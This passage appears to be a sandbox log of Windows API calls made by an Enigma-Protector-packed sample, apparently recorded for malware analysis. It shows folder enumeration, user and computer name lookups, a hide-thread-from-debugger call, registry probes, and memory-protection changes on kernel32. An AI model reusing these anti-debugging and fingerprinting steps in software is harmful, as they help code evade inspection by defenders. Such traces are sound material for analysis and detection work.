pbstr=0x13ffd68*="c:\\Users\\") returned 1 [0052.728] SysReAllocStringLen (in: pbstr=0x13ffaa8*="users", psz="fd1hvy", len=0x6 | out: pbstr=0x13ffaa8*="fd1hvy") returned 1 [0052.728] FindFirstFileW (in: lpFileName="c:\\Users\\fd1hvy", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x6a4f0 [0052.728] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0 [0052.728] GetLastError () returned 0x12 [0052.728] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.728] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\", psz="c:\\Users\\FD1HVy", len=0xf | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy") returned 1 [0052.728] SysReAllocStringLen (in: pbstr=0x13ffd68*="c:\\Users\\FD1HVy", psz="c:\\Users\\FD1HVy\\", len=0x10 | out: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\") returned 1 [0052.728] SysReAllocStringLen (in: pbstr=0x13ffaa8*="fd1hvy", psz="appdata", len=0x7 | out: pbstr=0x13ffaa8*="appdata") returned 1 [0052.728] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\appdata", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6a4f0 [0052.728] FindNextFileW (in: hFindFile=0x6a4f0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b5a0677, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0052.728] GetLastError () returned 0x12 [0052.728] FindClose (in: hFindFile=0x6a4f0 | out: hFindFile=0x6a4f0) returned 1 [0052.729] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\", psz="c:\\Users\\FD1HVy\\AppData", len=0x17 | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData") returned 1 [0052.729] SysReAllocStringLen (in: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData", psz="c:\\Users\\FD1HVy\\AppData\\", len=0x18 | out: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData\\") returned 1 [0052.729] SysReAllocStringLen (in: pbstr=0x13ffaa8*="appdata", psz="local", len=0x5 | out: pbstr=0x13ffaa8*="local") returned 1 [0052.729] FindFirstFileW (in: lpFileName="c:\\Users\\FD1HVy\\AppData\\local", lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x69ff0 [0052.729] FindNextFileW (in: hFindFile=0x69ff0, lpFindFileData=0x13ffad4 | out: lpFindFileData=0x13ffad4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0052.729] GetLastError () returned 0x12 [0052.729] FindClose (in: hFindFile=0x69ff0 | out: hFindFile=0x69ff0) returned 1 [0052.729] SysReAllocStringLen (in: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\", psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffa9c*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.729] SysReAllocStringLen (in: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData\\Local", psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.730] SysReAllocStringLen (in: pbstr=0x13ffa98*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0x13ffa98*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.730] SysReAllocStringLen (in: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData\\Local\\", psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffd68*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.730] SysReAllocStringLen (in: pbstr=0x13ffd6c*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local", len=0x1d | out: pbstr=0x13ffd6c*="c:\\Users\\FD1HVy\\AppData\\Local") returned 1 [0052.730] SysReAllocStringLen (in: pbstr=0xe60088*=0x0, psz="c:\\Users\\FD1HVy\\AppData\\Local\\", len=0x1e | out: pbstr=0xe60088*="c:\\Users\\FD1HVy\\AppData\\Local\\") returned 1 [0052.730] VirtualFree (lpAddress=0xe64000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0052.732] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.733] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0052.734] GetCurrentThread () returned 0xfffffffe [0052.734] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0052.743] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.743] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.743] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.743] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0052.743] GetUserNameA (in: lpBuffer=0xbec338, pcbBuffer=0xbec334 | out: lpBuffer="FD1HVy", pcbBuffer=0xbec334) returned 1 [0052.751] GetComputerNameA (in: lpBuffer=0xbec44c, nSize=0xbec448 | out: lpBuffer="NQDPDE", nSize=0xbec448) returned 1 [0052.751] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe60134, cbMultiByte=43, lpWideCharStr=0x13fee14, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8xĿ") returned 43 [0052.751] SysReAllocStringLen (in: pbstr=0xe3209c*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0xe3209c*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0052.751] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.751] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.751] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.751] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0052.751] GetWindowsDirectoryA (in: lpBuffer=0x13ffcaf, uSize=0x105 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0052.752] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0052.752] DeviceIoControl (in: hDevice=0x258, dwIoControlCode=0x2d1400, lpInBuffer=0x13ffdb4*, nInBufferSize=0xc, lpOutBuffer=0xe601a0, nOutBufferSize=0x2710, lpBytesReturned=0x13ffdc4, lpOverlapped=0x0 | out: lpInBuffer=0x13ffdb4*, lpOutBuffer=0xe601a0*, lpBytesReturned=0x13ffdc4*=0x18c, lpOverlapped=0x0) returned 1 [0052.752] CloseHandle (hObject=0x258) returned 1 [0052.753] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.754] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.754] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.754] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.754] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.755] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.755] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.755] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.756] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.756] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.756] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.756] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.757] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.757] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.757] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.758] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.758] GetCurrentProcessId () returned 0x13d8 [0052.758] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.758] GetProcAddress (hModule=0x772d0000, lpProcName="CreateToolhelp32Snapshot") returned 0x7731edc0 [0052.758] GetProcAddress (hModule=0x772d0000, lpProcName="Heap32ListFirst") returned 0x7731f1a0 [0052.758] GetProcAddress (hModule=0x772d0000, lpProcName="Heap32ListNext") returned 0x7731f250 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Heap32First") returned 0x7731f2f0 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Heap32Next") returned 0x7731f510 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x772e8830 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Process32First") returned 0x7731f810 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Process32Next") returned 0x7731f9a0 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Process32FirstW") returned 0x7731f750 [0052.759] GetProcAddress (hModule=0x772d0000, lpProcName="Process32NextW") returned 0x7731f8f0 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Thread32First") returned 0x7731fa80 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Thread32Next") returned 0x7731fb30 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Module32First") returned 0x7731fc90 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Module32Next") returned 0x7731fe30 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Module32FirstW") returned 0x7731fbd0 [0052.760] GetProcAddress (hModule=0x772d0000, lpProcName="Module32NextW") returned 0x7731fd80 [0052.760] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x13d8) returned 0x25c [0052.770] Module32First (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.770] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.771] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.772] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.773] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.773] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.774] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.775] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.776] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.776] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.777] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.778] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.779] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.779] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.783] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.784] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.785] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.786] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.786] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.787] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.788] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.788] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.789] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.790] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.791] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.792] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.792] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.793] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.794] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.794] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.795] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.796] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.797] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.797] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.798] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 1 [0052.799] Module32Next (hSnapshot=0x25c, lpme=0x13ffbf4) returned 0 [0052.799] CloseHandle (hObject=0x25c) returned 1 [0052.799] LoadStringA (in: hInstance=0xa9a000, uID=0xffdf, lpBuffer=0x13fe9b4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0052.800] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.800] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.800] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa92000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa92000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa94000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa94000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa96000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa96000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0052.800] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0x13ffdfc, dwLength=0x1c | out: lpBuffer=0x13ffdfc*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0052.800] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x13fed54, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopers", lpUsedDefaultChar=0x0) returned 25 [0052.801] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x13ffd58 | out: phkResult=0x13ffd58*=0x0) returned 0x2 [0052.801] GetLocalTime (in: lpSystemTime=0x13ffd78 | out: lpSystemTime=0x13ffd78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.801] GetLocalTime (in: lpSystemTime=0x13ffd78 | out: lpSystemTime=0x13ffd78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.801] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe63fc8, cbMultiByte=8, lpWideCharStr=0x13fed84, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆㸱æĿĿĿ") returned 8 [0052.801] GetLocalTime (in: lpSystemTime=0x13ffcd4 | out: lpSystemTime=0x13ffcd4*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.801] GetLocalTime (in: lpSystemTime=0x13ffcd4 | out: lpSystemTime=0x13ffcd4*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.801] GetLocalTime (in: lpSystemTime=0x13ffcd4 | out: lpSystemTime=0x13ffcd4*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.801] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x13ffc90 | out: phkResult=0x13ffc90*=0x0) returned 0x2 [0052.802] CreateFileW (lpFileName="c:\\users\\fd1hvy\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0052.802] GetLocalTime (in: lpSystemTime=0x13ffcd0 | out: lpSystemTime=0x13ffcd0*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.802] GetLocalTime (in: lpSystemTime=0x13ffdfc | out: lpSystemTime=0x13ffdfc*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xa, wMilliseconds=0xe4)) [0052.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb853b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x13ffe24 | out: lpThreadId=0x13ffe24*=0x7b0) returned 0x25c [0052.803] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.803] RtlUnwind (TargetFrame=0x13ffe08, TargetIp=0xa9d98c, ExceptionRecord=0x13ff298, ReturnValue=0x0) [0052.803] GetCurrentProcessId () returned 0x13d8 [0052.803] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x13d8) returned 0x260 [0052.807] Module32First (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.808] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.809] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.809] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.809] Module32Next (hSnapshot=0x260, lpme=0x13ffc00) returned 1 [0052.810] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0052.810] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0052.810] GetModuleFileNameA (in: hModule=0x772d0000, lpFilename=0x13ffa94, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0052.817] GetCurrentProcess () returned 0xffffffff [0052.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350be4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.818] GetCurrentProcess () returned 0xffffffff [0052.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350be4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.818] GetCurrentProcess () returned 0xffffffff [0052.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cd4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.818] GetCurrentProcess () returned 0xffffffff [0052.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cd4, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.818] GetCurrentProcess () returned 0xffffffff [0052.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cd8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x4, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x2) returned 0x0 [0052.819] GetCurrentProcess () returned 0xffffffff [0052.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffb98*=0x77350cd8, NumberOfBytesToProtect=0x13ffb9c, NewAccessProtection=0x2, OldAccessProtection=0x13ffbd0 | out: BaseAddress=0x13ffb98*=0x77350000, NumberOfBytesToProtect=0x13ffb9c, OldAccessProtection=0x13ffbd0*=0x4) returned 0x0 [0052.819] GetCurrentProcess () returned 0xffffffff 